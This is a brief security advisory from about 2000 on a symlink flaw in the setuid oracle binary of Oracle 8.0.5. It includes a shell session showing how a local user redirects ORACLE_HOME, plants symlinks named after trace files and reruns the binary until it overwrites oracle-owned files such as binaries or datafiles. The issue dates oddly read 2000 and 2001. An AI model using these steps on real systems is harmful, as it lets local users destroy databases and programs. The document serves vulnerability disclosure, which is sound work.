WWW.PLAZASITE.COM
System & Security Division
Title: Vulnerability in oracle binary in Oracle 8.0.5
Date: 11-12-2000
Platform: Only tested in Linux, but can be "exported" to others.
Impact: Any user compromise any file owned by oracle (DDBB owner).
Author: Juan Manuel Pascual (pask@plazasite.com)
Status: Vendor Contacted at 18th July 2001
PROBLEM SUMMARY:
There is a write permision checking error in oracle binary that can
be used by local
users to write any file owned by oracle.
IMPACT:
Any user with local access, can corrupt the database. Overwrite
oracle binaries, etc.
SOLUTION:
Chmod -s ;-)))).
STATUS:
Vendor was contacted .
----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba pask@plazasite.com
Only for educational purposes. (corrupt a ddbb isnt an educational purpose!)
[pask@proves1 /tmp]$
[pask@proves1 /tmp]$ mkdir rdbms
[pask@proves1 /tmp]$ cd rdbms/
[pask@proves1 rdbms]$ mkdir log
[pask@proves1 rdbms]$ cd log
[pask@proves1 log]$
[pask@proves1 log]$ ls -alc
total 8
drwxrwxr-x 2 pask pask 4096 dic 14 02:33 .
drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
[pask@proves1 log]$ export ORACLE_HOME=/tmp
[pask@proves1 log]$ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ ls -alc
total 12
drwxrwxr-x 2 pask pask 4096 dic 14 02:35 .
drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
-rw-r----- 1 oracle pask 47 dic 14 02:35 ora_24028.trc
Upsssssssss a log owned by oracle with the structure ora_pid.trc
I can create:
[pask@proves1 log]$ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
.
..
...
until the log will be my link .. and i overwrite the binary. what about dbf files and go on ....
